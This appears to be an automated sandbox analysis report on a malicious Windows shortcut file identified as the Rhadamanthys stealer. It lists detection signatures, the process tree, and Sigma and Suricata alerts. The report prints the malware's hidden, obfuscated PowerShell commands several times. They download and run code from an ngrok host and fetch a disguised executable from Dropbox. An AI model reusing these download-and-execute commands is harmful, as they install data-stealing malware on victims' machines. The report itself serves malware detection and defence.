Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
751ietQPnX.lnk

Overview

General Information

Sample name:751ietQPnX.lnk
renamed because original name is a hash value
Original sample name:da4b8840562135313b4af52637a248fbab262a37fb041e12a9b93e5cda32ae2f.lnk
Analysis ID:1572663
MD5:80088bacc66572cd6744243cf62be2ba
SHA1:595caf1d649749b0da44866cd5c13afaf21f5626
SHA256:da4b8840562135313b4af52637a248fbab262a37fb041e12a9b93e5cda32ae2f
Tags:Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2484 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7148 cmdline: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • msedge.exe (PID: 7356 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7620 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1976,i,479339844209240994,6957522588551196104,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 8532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8592 cmdline: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; " MD5: 04029E121A0CFA5991749937DD22A1D9)
          • msedge.exe (PID: 5220 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1027599800.pdf MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 6248 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=2128,i,4843216233513846130,16606171289243587075,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • 854113748.exe (PID: 6272 cmdline: "C:\Users\user\AppData\Local\Temp\854113748.exe" MD5: EB40135D3E0FE985A9E09970DC09A499)
            • 854113748.exe (PID: 416 cmdline: "C:\Users\user\AppData\Local\Temp\854113748.exe" MD5: EB40135D3E0FE985A9E09970DC09A499)
              • fontdrvhost.exe (PID: 8100 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
                • fontdrvhost.exe (PID: 7376 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
                  • WerFault.exe (PID: 8776 cmdline: C:\Windows\system32\WerFault.exe -u -p 7376 -s 148 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 908 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 444 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7496 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7628 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8348 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6340 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8388 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6528 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • identity_helper.exe (PID: 8944 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7120 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • identity_helper.exe (PID: 8964 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7120 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • msedge.exe (PID: 6804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=3404 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2696 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8376 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7412 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6708 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 7560 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8492 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1108 --field-trial-handle=1948,i,14212657581130048292,735076137658541707,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 8216 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5600 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1996,i,241946409549104947,2634262981403856413,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001E.00000003.2342679249.00000000033C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000001D.00000002.2353583074.0000000000A10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            29.3.854113748.exe.2ff0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              30.3.fontdrvhost.exe.58b0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                29.3.854113748.exe.2dd0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  30.3.fontdrvhost.exe.5690000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    30.3.fontdrvhost.exe.5690000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powerup Write Hijack DLL
                      Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7148, TargetFilename: C:\Users\user\AppData\Local\Temp\1462386273.bat
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\854113748.exe, ProcessId: 6272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PerfectouinVans
                      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7148, TargetFilename: C:\Users\user\AppData\Local\Temp\1462386273.bat
                      Sigma detected: PowerShell Web Download
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; ", CommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8532, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; ", ProcessId: 8592, ProcessName: powershell.exe
                      Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2484, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), ProcessId: 7148, ProcessName: powershell.exe
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), ProcessId: 2484, ProcessName: cmd.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2484, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), ProcessId: 7148, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7496, ProcessName: svchost.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-10T18:41:30.742148+010028032742Potentially Bad Traffic192.168.2.449735162.125.69.18443TCP
                      2024-12-10T18:41:45.354267+010028032742Potentially Bad Traffic192.168.2.449790162.125.69.18443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-10T18:42:17.083476+010028548021Domain Observed Used for C2 Detected162.213.210.2506499192.168.2.449834TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeReversingLabs: Detection: 26%
                      Multi AV Scanner detection for submitted file
                      Source: 751ietQPnX.lnkReversingLabs: Detection: 18%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: 751ietQPnX.lnkJoe Sandbox ML: detected

                      Compliance

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeUnpacked PE file: 26.2.854113748.exe.2220000.2.unpack
                      Source: unknownHTTPS traffic detected: 18.192.31.165:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.4:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49795 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 18.192.31.165:443 -> 192.168.2.4:49800 version: TLS 1.2
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2278426840.000002336DB4B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000010.00000002.2282838688.0000023B6EE9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: 854113748.exe, 0000001D.00000003.2340149595.0000000000F20000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340267249.0000000002E50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345418878.0000000005710000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345179644.00000000039C0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: 854113748.exe, 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340562486.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb= source: powershell.exe, 00000010.00000002.2278426840.000002336DB5F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: 854113748.exe, 0000001D.00000003.2339382233.0000000002FC0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339181691.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000010.00000002.2277453926.000002336DB34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: 854113748.exe, 0000001D.00000003.2339895618.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339702134.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344912074.0000000005830000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344721421.0000000005690000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb`Il source: 854113748.exe, 0000001A.00000000.2141718264.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371490999.0000000002420000.00000004.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
